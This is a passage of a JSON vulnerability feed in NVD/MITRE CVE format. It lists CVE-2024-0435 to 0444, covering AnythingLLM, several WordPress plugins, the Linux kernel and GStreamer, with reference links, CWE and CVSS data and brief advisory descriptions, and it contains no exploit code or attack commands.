"https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61", "name" : "https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61", "name" : "https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "User can send a chat that contains an XSS opportunity that will then run when the chat is sent and on subsequent page loads.\n\nGiven the minimum requirement for a user to send a chat is to be given access to a workspace via an admin the risk is low. Additionally, the location in which the XSS renders is only limited to the user who submits the XSS. \n\nUltimately, this attack is limited to the user attacking themselves. There is no anonymous chat submission unless the user does not take the minimum steps required to protect their instance." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-25T22:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0436", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-203" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0", "name" : "https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0", "name" : "https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268", "name" : "https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268", "name" : "https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Theoretically, it would be possible for an attacker to brute-force the password for an instance in single-user password protection mode via a timing attack given the linear nature of the `!==` used for comparison.\n\nThe risk is minified by the additional overhead of the request, which varies in a non-constant nature making the attack less reliable to execute" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-03-27T11:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0437", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Password Protected – Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the API. This makes it possible for authenticated attackers, with subscriber access or higher, to extract post titles and content, thus bypassing the plugin's password protection." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-15T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0438", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991", "name" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991", "name" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50", "name" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50", "name" : "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leevio:happy_addons_for_elementor:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "3.10.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2024-12-27T15:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0439", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688", "name" : "https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688", "name" : "https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce", "name" : "https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce", "name" : "https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "As a manager, you should not be able to modify a series of settings. In the UI this is indeed hidden as a convenience for the role since most managers would not be savvy enough to modify these settings. They can use their token to still modify those settings though through a standard HTTP request\n\nWhile this is not a critical vulnerability, it does indeed need to be patched to enforce the expected permission level." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-26T15:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0440", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3", "name" : "https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3", "name" : "https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f", "name" : "https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f", "name" : "https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Attacker, with permission to submit a link or submits a link via POST to be collected that is using the file:// protocol can then introspect host files and other relatively stored files." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-27T03:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0442", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via element URL parameters in all versions up to, and including, 1.3.87 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-08T18:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0443", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-668" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2023:6583", "name" : "RHSA-2023:6583", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2023:6583", "name" : "RHSA-2023:6583", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2023:7077", "name" : "RHSA-2023:7077", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2023:7077", "name" : "RHSA-2023:7077", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2023:7370", "name" : "RHSA-2023:7370", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2023:7370", "name" : "RHSA-2023:7370", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0443", "name" : "https://access.redhat.com/security/cve/CVE-2024-0443", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0443", "name" : "https://access.redhat.com/security/cve/CVE-2024-0443", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257968", "name" : "RHBZ#2257968", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257968", "name" : "RHBZ#2257968", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/", "name" : "https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/", "name" : "https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/", "refsource" : "", "tags" : [ "Mailing List" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with a local access to cause system instability, such as an out of memory error." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2", "versionEndExcluding" : "6.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-12T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0444", "ASSIGNER" : "zdi-disclosures@trendmicro.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f368d63ecd89e01fd2cf0b1c4def5fc782b2c390", "name" : "vendor-provided URL", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f368d63ecd89e01fd2cf0b1c4def5fc782b2c390", "name" : "vendor-provided URL", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.zerodayinitiative.com/advisories/ZDI-24-567/", "name" : "ZDI-24-567", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.zerodayinitiative.com/advisories/ZDI-24-567/", "name" : "ZDI-24-567", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "GStreamer AV1 Video Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the parsing of tile list data within AV1-encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22873." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gstreamer_project:gstreamer:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-07T23:15Z", "lastModifiedDate" : "2024-12-27T18:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0445", 